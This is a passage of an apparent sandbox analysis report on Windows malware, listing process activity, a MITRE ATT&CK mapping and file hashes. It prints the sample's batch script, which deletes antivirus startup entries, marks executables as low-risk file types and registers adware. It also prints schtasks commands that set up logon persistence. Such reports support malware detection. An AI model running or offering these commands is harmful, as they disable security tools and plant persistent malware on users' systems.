"HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
-
C:\Users\Admin\AppData\Local\Temp\C628.exeC:\Users\Admin\AppData\Local\Temp\C628.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\C628.exeC:\Users\Admin\AppData\Local\Temp\C628.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\CF70.exeC:\Users\Admin\AppData\Local\Temp\CF70.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\cheat.exe"C:\Users\Admin\AppData\Local\Temp\cheat.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\D25F.exeC:\Users\Admin\AppData\Local\Temp\D25F.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 7322⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 7482⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 6682⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 8882⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 7322⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\D399.exeC:\Users\Admin\AppData\Local\Temp\D399.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 7322⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 7482⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 8442⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 8922⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 8562⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\dhcpcmonitor\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\ProgramData\Desktop\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\fajaeitC:\Users\Admin\AppData\Roaming\fajaeit1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\Database.exeMD5
30f0a5fe731fd2735b8c196fd0fe91cf
SHA12eb63724fd11bf8e082bcd99301654111ad0d831
SHA25613881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Data\install.exeMD5
3319cb474eaa2f3812956b271ff29635
SHA174fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA25679d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE14D.tmp.WERInternalMetadata.xmlMD5
8295dff0d171922fc63b36af8d5ded79
SHA1b71899da9a82a202cdfecf1b1e06bc9e042a930c
SHA25600616fe7b38654b63b8a039ac945eff9dd0cffbcd27546a6ddee58532f4c0325
SHA512ee7c51d00a49d417a9a0eceb26d38cb72ccbd4f1cf6e2bff33918578d3778ea8545d91c0dc6e8c505b5c93761198b8e62cf21ac9cbbaf81da17a5958821debf9
-
C:\ProgramData\Runtimebroker.exeMD5
62d1b104b14022206b559167d97f7007
SHA1cec380a9e863382fc1e37796f2f644a0dc3e3dbc
SHA2562917de6c13402e8ed00f0955929a5b131c1624f8261a077a135d08f01c1e71e5
SHA512821392e15527f511fa8d0568f5befdbbd10858ec50f400c868d36c062103a8a77bc4188050f954ec560c9f99d275feff9daa484372b379f90ed0c9070944a5d7
-
C:\ProgramData\Runtimebroker.exeMD5
62d1b104b14022206b559167d97f7007
SHA1cec380a9e863382fc1e37796f2f644a0dc3e3dbc
SHA2562917de6c13402e8ed00f0955929a5b131c1624f8261a077a135d08f01c1e71e5
SHA512821392e15527f511fa8d0568f5befdbbd10858ec50f400c868d36c062103a8a77bc4188050f954ec560c9f99d275feff9daa484372b379f90ed0c9070944a5d7
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\HostData.exeMD5
cbf26c74a0a12b5f17ba7596ff6ad19f
SHA16dc733432c290f1fbf5ddda2571b7f538445202b
SHA256095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA5128a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\config.jsonMD5
a285ac140c8c6806223bfdc02302173e
SHA106ca61cae058c568860858e49615d04dc4a8820d
SHA25636d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb
SHA512f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
c558fdaa3884f969f1ec904ae7bbd991
SHA1b4f85d04f6bf061a17f52c264c065b786cfd33ff
SHA2563e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e
SHA5126523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
c8fb24a132990fc219bf4b9389aaca56
SHA1a40a89c7a2656769a6f92f9cc650695eadd02263
SHA2563e6db36517bda522a7f607b14c088bf5c8b88be7c7a16606e3cad64fcb9b6728
SHA5127389d43b6e3ccb9255ba219d965e5dddbf34a47e3714afde530c4e68d541ed690e1fe7c18bb6b515e7820ab11e474bdc1860243eb88e82c2c7a8038c621770f0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
f728dea87c5e5f116f544678b78c52a9
SHA1884dc3610641c7344d5988600b373f286639c50d
SHA2563643d4c5a065cf65ee34c509615866b8e3e4d71f3beb8711354e5e6a8ebee790
SHA512b8cf42bea9019b09a603aa697e69d2a74e997123d8fde3bd2f41876788705b357a063f48f144ea9b86330a9ebc5cf4096bd052530a5071a464a3b241710f5a07
-
C:\Users\Admin\AppData\Local\Temp\AEE3.exeMD5
a69e12607d01237460808fa1709e5e86
SHA14a12f82aee1c90e70cdf6be863ce1a749c8ae411
SHA256188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
SHA5127533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
-
C:\Users\Admin\AppData\Local\Temp\AEE3.exeMD5
a69e12607d01237460808fa1709e5e86
SHA14a12f82aee1c90e70cdf6be863ce1a749c8ae411
SHA256188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
SHA5127533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
-
C:\Users\Admin\AppData\Local\Temp\B472.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\B472.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\B472.exeMD5
e987477b0d14b6d7075f0105aa28ba92
SHA154bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA2564fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\BD9B.exeMD5
49f58a80993170b4351014d0b5068897
SHA17af2615ec10821cbefb55c602b270c27fa1d6806
SHA256905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
